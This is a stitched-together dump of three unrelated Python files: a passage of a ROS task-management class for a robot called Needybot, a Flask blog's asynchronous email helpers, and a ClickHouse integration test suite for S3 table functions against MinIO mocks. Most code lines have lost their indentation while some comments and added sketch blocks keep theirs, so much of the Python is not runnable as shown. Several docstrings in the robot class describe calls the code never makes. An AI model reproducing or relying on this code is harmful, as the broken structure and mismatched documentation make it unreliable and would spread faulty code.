        Handles a shutdown of the task but, instead of calling signal_complete,
        this method calls `signal_aborted`, which lets the task server know
        that it can proceed with launching a mayday task (as opposed to queueing
        up another general task).
        Args:
            req: the service request that triggered the abort (may be None when
            called internally).
"""
if not self.active:
logwarn("Can't abort {} because task isn't active.".format(self.name))
return False
self.instruct()
self.prep_shutdown(did_fail=True)
return True
def add_step(self, instance):
        # If the item is a sequence, flatten its steps into the steps dictionary
if isinstance(instance, TaskStep):
self.steps[instance.name] = instance
self.steps[instance.name].task_name = self.name
return
for key, step in instance.steps.iteritems():
self.steps[step.name] = step
self.steps[step.name].task_name = self.name
def add_steps(self, steps):
for step in steps:
self.add_step(step)
def add_subscribers(self):
self.subscribers = [
rospy.Subscriber(
nb_channels.Messages.replay.value,
ros_msg.Empty,
self.replay_handler
),
rospy.Subscriber(
nb_channels.Messages.cancel_timer.value,
ros_msg.Empty,
self.cancel_timer_handler
),
rospy.Subscriber(
nb_channels.Messages.reset_timer.value,
ros_msg.Empty,
self.reset_timer_handler
),
rospy.Subscriber(
nb_channels.Safety.picked_up.value,
ros_msg.Empty,
self.picked_up_handler
),
rospy.Subscriber(
nb_channels.Safety.put_down.value,
ros_msg.Empty,
self.put_down_handler
)
]
def audio_done_instruct_cb(self, state, result):
self.instruct()
def abort_entered(self, step):
"""
Step entered handler that aborts the task.
"""
self.abort()
def cancel_timer(self):
if self.step_timer and self.step_timer.is_alive():
self.step_timer.shutdown()
def cancel_timer_handler(self, msg):
self.cancel_timer()
def complete_entered(self, step):
"""
Step entered handler that signals the task server that the task is complete.
"""
self.task_shutdown()
def load_entered(self, step):
"""
        Step entered handler for the load step.
        This base class should never be invoked directly; subclasses of Task
        extend or override this handler for their own load step.
        Responsible for loading up the task: it registers the task's
        subscribers and then publishes the step's instructions to the iPad
        (and any future listeners) to signal that the task is ready.
        Args:
            step (TaskStep): the load step that was just entered.
"""
self.add_subscribers()
self.instruct()
def pause(self):
self.paused_time = rospy.Time.now()
self.paused = True
if self.step_timer:
self.step_timer.shutdown()
self.step_timer = None
def picked_up_handler(self, msg):
self.cancel_timer()
def put_down_handler(self, msg):
self.reset_timer()
def replay_handler(self, msg):
"""
        Resets the step timer every time the replay button is tapped on the iPad.
"""
self.update_step_timer(self.current_step)
def reset(self, req=None):
# Reset flags
self.active = True
self.did_fail = False
self.completed = False
return EmptyResponse()
def reset_timer(self):
self.update_step_timer(self.current_step)
def reset_timer_handler(self, msg):
self.reset_timer()
def resume(self):
if not self.paused:
return
self.paused = False
        if self.current_step.timeout > 0:
            # Resume the timer with the time that remained when the step was paused.
            elapsed = (self.paused_time - self.step_load_time).to_sec()
            self.step_timer = rospy.Timer(
                rospy.Duration(self.current_step.timeout - elapsed),
                self.step_to_handler,
                oneshot=True
            )
self.paused_time = None
def shutdown(self):
super(Task, self).shutdown()
self.task_latcher.unregister()
def step_load(self, step):
        # If listening for any responses from the iPad, disable the subscriber
if self.current_step and self.current_step.exited_handler:
self.current_step.exited_handler(self.current_step, step)
self.current_step = step
self.step_load_time = rospy.Time.now()
self.update_step_timer(self.current_step)
self.task_latcher.step_task(self.current_step.name)
        # Checks if the step should block; by default it will toss it into its own thread
if self.current_step.entered_handler:
if self.current_step.blocking:
self.current_step.entered_handler(self.current_step)
else:
entered_thread = threading.Thread(target=self.current_step.entered_handler, args=[self.current_step])
entered_thread.start()
def prep_shutdown(self, did_fail=False):
"""
Handles:
* resetting instance values to their defaults
* shutting down the task and step timers
* stopping the fishing client
* updating the emotional value of Needybot
* informing the iPad that the task is finished
Kwargs:
did_fail (bool): whether or not the task failed [Default: False]
"""
self.active = False
self.remove_subscribers()
if self.step_timer and self.step_timer.is_alive():
self.step_timer.shutdown()
self.step_timer = None
self.did_fail = did_fail
def remove_subscribers(self):
for sub in self.subscribers:
sub.unregister()
def step_name(self, req):
return MessageResponse(value=self.current_step.name)
def next_step(self, req):
"""
        Service method that takes the returned status from the iPad and returns
        the name of the next step for that outcome (success, failure, or
        timeout), or an empty name if the current step is not set.
        Args:
            req (NextStepRequest): request whose `status` field holds the
            outcome of the previous step.
        Returns:
            NextStepResponse: carries the name of the next step, if any.
"""
with self.lock:
if not self.current_step:
logwarn("Can't retrieve next step name. Current step is not set.")
return NextStepResponse(name='')
step = self.current_step
if req.status == TaskStepStatus.SUCCESS:
return NextStepResponse(name=step.success_step)
elif req.status == TaskStepStatus.FAILURE:
return NextStepResponse(name=step.failure_step)
elif req.status == TaskStepStatus.TIMEOUT:
return NextStepResponse(name=step.timeout_step)
def serve_step(self, name):
step = self.steps.get(name, None)
if not step:
logerr("Can't find step {} of task {} to serve".format(name, self.name))
return False
self.step_load(step)
return True
def startup(self):
"""
Helper method to fire up the task and keep it alive.
"""
while not rospy.is_shutdown():
self.rate.sleep()
def status(self, req):
"""
Service function. Returns status of this task.
"""
with self.lock:
return self.which_status()
    def step(self, req):
        with self.lock:
            step = self.steps.get(req.name, None)
            res = StepTaskResponse()
            res.success = False
            if not step:
                logerr("Problem loading step {}. Make sure the request's name is set properly.".format(req.name))
                return res
            self.step_load(step)
            res.success = True
            return res
def step_to_handler(self, msg):
if self.current_step.timeout_step:
self.serve_step(self.current_step.timeout_step)
else:
self.task_failed()
def task_failed(self):
"""
        Method that takes care of the necessary details before shutting the task down after a failure.
"""
rospy.logwarn("Task failed. Shutting it down.")
self.active = False
self.task_shutdown(True)
def task_payload(self, req):
"""
Service call that returns the payload information for this task.
Mainly used to pass data b/t running tasks.
"""
with self.lock:
res = TaskPayloadResponse(
name=self.name,
status=self.which_status(),
did_fail=self.did_fail
)
return res
def task_shutdown(self, did_fail=False):
"""
Helper method responsible for shutting a task down.
Resets values to their defaults, shuts down timeout counters,
and notifies the iPad and task server node of its completion.
        Kwargs:
            did_fail (bool): whether or not the task failed. [Default: False]
"""
self.prep_shutdown(did_fail)
        self.completed = not did_fail
def update_step_timer(self, step):
"""
Helper method that shuts the current step timer down, then recreates
the step timer for the next step in the task.
If the step timeout is zero, do not create a new timeout; otherwise
create a new timer using the timeout value.
Args:
step (dict): the dictionary object representing the task step.
"""
if self.step_timer and self.step_timer.is_alive():
self.step_timer.shutdown()
if not self.active:
return
if step and step.timeout > 0:
self.step_timer = rospy.Timer(
rospy.Duration(step.timeout),
self.step_to_handler,
oneshot=True
)
def which_status(self):
status = TaskStatusRequest.INACTIVE
if self.did_fail:
status = TaskStatusRequest.FAILED
elif self.completed:
status = TaskStatusRequest.COMPLETED
elif self.active:
status = TaskStatusRequest.RUNNING
return status
def instruct(self):
"""
Helper function to send messages to the iPad.
        This needs to be called manually; it is not called automatically
        for every step.
"""
if self.current_step and self.current_step.instructions:
cable.instruct(self.current_step.instructions)
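# A minimal, hedged sketch (not part of the original Needybot codebase) of how a
# concrete task might subclass Task and register its own steps. The task name,
# step names, timeouts, and handlers below are invented for illustration only.
class ExampleDeliveryTask(Task):

    def __init__(self):
        super(ExampleDeliveryTask, self).__init__('example_delivery')
        self.add_steps([
            TaskStep(
                'navigate',
                timeout=30,
                success_step='handoff',
                failure_step='abort',
                entered_handler=self.navigate_entered
            ),
            TaskStep(
                'handoff',
                timeout=60,
                success_step='complete',
                failure_step='abort',
                entered_handler=self.handoff_entered,
                blocking=True
            ),
        ])

    def navigate_entered(self, step):
        # Start navigation here; call step.succeed() or step.fail() once the
        # robot reaches (or fails to reach) its goal.
        pass

    def handoff_entered(self, step):
        # Prompt the human for the handoff; the step timer fires
        # step_to_handler if nothing happens within the timeout.
        pass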
|
emails.py
|
# -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li <withlihui@gmail.com>
:license: MIT, see LICENSE for more details.
"""
from threading import Thread
from flask import url_for, current_app
from flask_mail import Message
from bluelog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(subject, to, html):
app = current_app._get_current_object()
message = Message(subject, recipients=[to], html=html)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_new_comment_email(post):
post_url = url_for('blog.show_post', post_id=post.id, _external=True) + '#comments'
send_mail(subject='New comment', to=current_app.config['BLUELOG_EMAIL'],
html='<p>New comment in post <i>%s</i>, click the link below to check:</p>'
'<p><a href="%s">%s</a></P>'
'<p><small style="color: #868e96">Do not reply this email.</small></p>'
% (post.title, post_url, post_url))
def send_new_reply_email(comment):
post_url = url_for('blog.show_post', post_id=comment.post_id, _external=True) + '#comments'
send_mail(subject='New reply', to=comment.email,
html='<p>New reply for the comment you left in post <i>%s</i>, click the link below to check: </p>'
'<p><a href="%s">%s</a></p>'
'<p><small style="color: #868e96">Do not reply this email.</small></p>'
% (comment.post.title, post_url, post_url))
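# Hedged usage sketch (not part of Bluelog itself): demonstrates that send_mail
# returns the worker thread, so callers can optionally wait for delivery. The
# recipient address is a placeholder, and the call must run inside a Flask
# application context so current_app resolves.
def _example_send(recipient='someone@example.com'):
    thr = send_mail(subject='Test message',
                    to=recipient,
                    html='<p>This is only a test.</p>')
    thr.join(timeout=10)  # optional: block briefly until the mail is handed off
    return thr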
|
test.py
|
import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance, get_instances_dir
from helpers.network import PartitionManager
from helpers.test_tools import exec_query_with_retry
MINIO_INTERNAL_PORT = 9001
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './{}/dummy/configs/config.d/defaultS3.xml'.format(get_instances_dir()))
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(started_cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = started_cluster.minio_client
minio_client.set_bucket_policy(started_cluster.minio_bucket, json.dumps(bucket_read_write_policy))
started_cluster.minio_restricted_bucket = "{}-with-auth".format(started_cluster.minio_bucket)
if minio_client.bucket_exists(started_cluster.minio_restricted_bucket):
minio_client.remove_bucket(started_cluster.minio_restricted_bucket)
minio_client.make_bucket(started_cluster.minio_restricted_bucket)
def put_s3_file_content(started_cluster, bucket, filename, data):
buf = io.BytesIO(data)
started_cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(started_cluster, bucket, filename, decode=True):
# type: (ClickHouseCluster, str, str, bool) -> str
data = started_cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml", "configs/named_collections.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mocks(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put. Also checks that wrong credentials produce an error with every compression method.
@pytest.mark.parametrize("maybe_auth,positive,compression", [
pytest.param("", True, 'auto', id="positive"),
pytest.param("'minio','minio123',", True, 'auto', id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, 'auto', id="auto"),
pytest.param("'wrongid','wrongkey',", False, 'gzip', id="gzip"),
pytest.param("'wrongid','wrongkey',", False, 'deflate', id="deflate"),
pytest.param("'wrongid','wrongkey',", False, 'brotli', id="brotli"),
pytest.param("'wrongid','wrongkey',", False, 'xz', id="xz"),
pytest.param("'wrongid','wrongkey',", False, 'zstd', id="zstd")
])
def test_put(started_cluster, maybe_auth, positive, compression):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = f"""insert into table function s3('http://{started_cluster.minio_ip}:{started_cluster.minio_port}/{bucket}/{filename}',
{maybe_auth}'CSV', '{table_format}', {compression}) values settings s3_truncate_on_insert=1 {values}"""
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
def test_partition_by(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
partition_by = "column3"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert "1,2,3\n" == get_s3_file_content(started_cluster, bucket, "test_3.csv")
assert "3,2,1\n" == get_s3_file_content(started_cluster, bucket, "test_1.csv")
assert "78,43,45\n" == get_s3_file_content(started_cluster, bucket, "test_45.csv")
filename = "test2_{_partition_id}.csv"
instance.query(f"create table p ({table_format}) engine=S3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV') partition by column3")
instance.query(f"insert into p values {values}")
assert "1,2,3\n" == get_s3_file_content(started_cluster, bucket, "test2_3.csv")
assert "3,2,1\n" == get_s3_file_content(started_cluster, bucket, "test2_1.csv")
assert "78,43,45\n" == get_s3_file_content(started_cluster, bucket, "test2_45.csv")
def test_partition_by_string_column(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "col_num UInt32, col_str String"
partition_by = "col_str"
values = "(1, 'foo/bar'), (3, 'йцук'), (78, '你好')"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert '1,"foo/bar"\n' == get_s3_file_content(started_cluster, bucket, "test_foo/bar.csv")
assert '3,"йцук"\n' == get_s3_file_content(started_cluster, bucket, "test_йцук.csv")
assert '78,"你好"\n' == get_s3_file_content(started_cluster, bucket, "test_你好.csv")
def test_partition_by_const_column(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
partition_by = "'88'"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert values_csv == get_s3_file_content(started_cluster, bucket, "test_88.csv")
@pytest.mark.parametrize("special", [
"space",
"plus"
])
def test_get_file_with_special(started_cluster, special):
symbol = {"space": " ", "plus": "+"}[special]
urlsafe_symbol = {"space": "%20", "plus": "%2B"}[special]
auth = "'minio','minio123',"
bucket = started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = [[12549, 2463, 19893], [64021, 38652, 66703], [81611, 39650, 83516], [11079, 59507, 61546], [51764, 69952, 6876], [41165, 90293, 29095], [40167, 78432, 48309], [81629, 81327, 11855], [55852, 21643, 98507], [6738, 54643, 41155]]
values_csv = ('\n'.join((','.join(map(str, row)) for row in values)) + '\n').encode()
filename = f"get_file_with_{special}_{symbol}two.csv"
put_s3_file_content(started_cluster, bucket, filename, values_csv)
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}two.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
@pytest.mark.parametrize("special", [
"space",
"plus",
"plus2"
])
def test_get_path_with_special(started_cluster, special):
symbol = {"space": "%20", "plus": "%2B", "plus2": "%2B"}[special]
safe_symbol = {"space": "%20", "plus": "+", "plus2": "%2B"}[special]
auth = "'minio','minio123',"
table_format = "column1 String"
instance = started_cluster.instances["dummy"]
get_query = f"SELECT * FROM s3('http://resolver:8082/get-my-path/{safe_symbol}.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert run_query(instance, get_query).splitlines() == [f"/{symbol}.csv"]
# Test put no data to S3.
@pytest.mark.parametrize("auth", [
pytest.param("'minio','minio123',", id="minio")
])
def test_empty_put(started_cluster, auth):
# type: (ClickHouseCluster, str) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
drop_empty_table_query = "DROP TABLE IF EXISTS empty_table"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, drop_empty_table_query)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format))
assert False, "Query should be failed."
except helpers.client.QueryRuntimeException as e:
assert str(e).find("The specified key does not exist") != 0
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'minio','minio123',", True, id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, id="negative"),
])
def test_put_csv(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster, bool, str) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV settings s3_truncate_on_insert=1".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
def test_put_get_with_globs(started_cluster):
# type: (ClickHouseCluster) -> None
unique_prefix = random.randint(1,10000)
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}/{}_{}/{}.csv".format(unique_prefix, i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, unique_prefix, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
minio = started_cluster.minio_client
for obj in list(minio.list_objects(started_cluster.minio_bucket, prefix='{}/'.format(unique_prefix), recursive=True)):
minio.remove_object(started_cluster.minio_bucket, obj.object_name)
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'wrongid','wrongkey'", False, id="negative"),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
])
def test_multipart_put(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    # Minimum size of part is 5 MB for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = started_cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
def test_remote_host_filter(started_cluster):
instance = started_cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format)
assert "not allowed in configuration file" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format, other_values)
assert "not allowed in configuration file" in instance.query_and_get_error(query)
def test_wrong_s3_syntax(started_cluster):
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3('', '', '', '', '', '')"
assert expected_err_msg in instance.query_and_get_error(query)
expected_err_msg = "Code: 36" # BAD_ARGUMENTS
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3('')"
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mocks(started_cluster):
logging.info("Starting s3 mocks")
mocks = (
("mock_s3.py", "resolver", "8080"),
("unstable_server.py", "resolver", "8081"),
("echo.py", "resolver", "8082"),
)
for mock_filename, container, port in mocks:
container_id = started_cluster.get_container_id(container)
current_dir = os.path.dirname(__file__)
started_cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mocks", mock_filename), mock_filename)
started_cluster.exec_in_container(container_id, ["python", mock_filename, port], detach=True)
# Wait for S3 mocks to start
for mock_filename, container, port in mocks:
num_attempts = 100
for attempt in range(num_attempts):
ping_response = started_cluster.exec_in_container(started_cluster.get_container_id(container),
["curl", "-s", f"http://localhost:{port}/"], nothrow=True)
if ping_response != 'OK':
if attempt == num_attempts - 1:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
logging.debug(f"mock {mock_filename} ({port}) answered {ping_response} on attempt {attempt}")
break
logging.info("S3 mocks started")
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
def test_custom_auth_headers(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query("DROP TABLE IF EXISTS test")
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
instance.query("DROP TABLE test")
